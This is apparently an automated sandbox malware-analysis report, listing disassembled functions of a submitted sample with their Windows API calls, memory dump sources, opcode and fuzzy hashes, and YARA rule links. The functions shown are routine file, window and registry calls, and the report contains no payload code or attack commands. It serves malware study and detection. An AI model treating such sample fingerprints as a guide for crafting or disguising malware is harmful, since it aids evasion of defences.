                                                                                                        • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1658689577-0
                                                                                                      • Opcode ID: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                                                      • Instruction ID: ea6634d2ed8774f5e90a5a6f355d63bed973dafba18e0ec7d48b30ffe24ea089
                                                                                                      • Opcode Fuzzy Hash: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                                                      • Instruction Fuzzy Hash: C4314375E001199BCF01DF95C8819EEB7B9FF84314F15857BE815AB286E738AE018B98
                                                                                                      Function 0041FBAC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoScroll
                                                                                                      • String ID:
                                                                                                      • API String ID: 629608716-0
                                                                                                      • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                                      • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                                                      • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                                      • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                                      Function 0046C6F8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                        • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                                      • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C756,?,00000000,?,?,0046C968,?,00000000,0046C9DC), ref: 0046C73A
                                                                                                        • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                                        • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 1039859321-0
                                                                                                      • Opcode ID: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                                                                      • Instruction ID: 552ca42e7a4f22222615ff1de8f8c20df724e6475abae56b3c63f202feb1ec23
                                                                                                      • Opcode Fuzzy Hash: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                                                                      • Instruction Fuzzy Hash: 28F0E270248300FFEB059BB2EDD6B2577E8E319716F91043BF504866D0EA795D40C96E
                                                                                                      Function 004413A4 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                      • Instruction ID: d0e136ad155d69288fc423feb27b218c22c44688115b59a91c3ffefc647f2292
                                                                                                      • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                      • Instruction Fuzzy Hash: F0F0FF70509209DBBB1CCF54D0919AF7B71EB59310F20806FE907877A0D6346A80D759
                                                                                                      Function 00416560 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                      • Instruction ID: 39ad6e161323637dbb8254467e02d50acedd081d31d6b9d15e1adfc5f54150e8
                                                                                                      • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                      • Instruction Fuzzy Hash: 6EF02BB2200510AFDB84CF9CD9C0F9373ECEB0C210B0481A6FA08CF24AD220EC108BB0
                                                                                                      Function 004149C4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                      • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                      • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                      • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                      Function 004507B0 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                                                                      • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                      • Opcode Fuzzy Hash: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                                                                      • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                      Function 0042CCDC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A11,00000000,00452A32,?,00000000), ref: 0042CD07
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                                                                      • Instruction ID: bebe06870d533199fa05ec681e6f815a7bc371a3e359dcca221b2f893a48d47d
                                                                                                      • Opcode Fuzzy Hash: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                                                                      • Instruction Fuzzy Hash: 0AE06571304308BFD701EB62EC92A5EBBECD749714B914476B400D7592D5B86E008458
                                                                                                      Function 0042E8D8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 1306739567-0
                                                                                                      • Opcode ID: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                                      • Instruction ID: 1e04b5e42f682bd3307758a00633d1e15c64123c11c882a5e2d093d9edca25ee
                                                                                                      • Opcode Fuzzy Hash: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                                      • Instruction Fuzzy Hash: E7E0D86178432126F23524166C43B7B110E43C0704FD080267A809F3D6D6EE9949425E
                                                                                                      Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                      • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                                      • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                      • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                                      Function 0042DDF4 Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Create
                                                                                                      • String ID:
                                                                                                      • API String ID: 2289755597-0
                                                                                                      • Opcode ID: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                                                      • Instruction ID: 00bf656f3cc58d957e3fc120c7d975a7f6f089e768df8f95d2ce2a55afbcf34e
                                                                                                      • Opcode Fuzzy Hash: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                                                      • Instruction Fuzzy Hash: 69E07EB2600119AF9B40DE8CDC81EEB37ADAB1D350F414016FA08E7200C274EC519BB4
                                                                                                      Function 00454BE4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindClose.KERNEL32(00000000,000000FF,00470C14,00000000,00471A10,?,00000000,00471A59,?,00000000,00471B92,?,00000000,?,00000000), ref: 00454BFA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                                                      • Instruction ID: 3c3cb6916585ff7422749358fc170cdffb6a73b651657da6609ae8be1e4b77d0
                                                                                                      • Opcode Fuzzy Hash: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                                                      • Instruction Fuzzy Hash: A7E065B0A056004BCB15DF3A858021A76D25FC5325F05C96AAC58CF397D63C84955656
                                                                                                      Function 0041468C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(004953B6,?,004953D8,?,?,00000000,004953B6,?,?), ref: 004146AB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                      • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                      • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                      • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                      Function 00406F18 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                                                      • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                                                      • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                                                      • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                                                      Function 0042365C Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                                      • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                        • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoParametersSystem$ShowWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3202724764-0
                                                                                                      • Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                                      • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                                      • Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                                                      • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                                      Function 004242D4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: TextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 530164218-0
                                                                                                      • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                      • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                                      • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                                      • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                                      Function 0042CD34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,00000000,004515B7,00000000), ref: 0042CD3F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
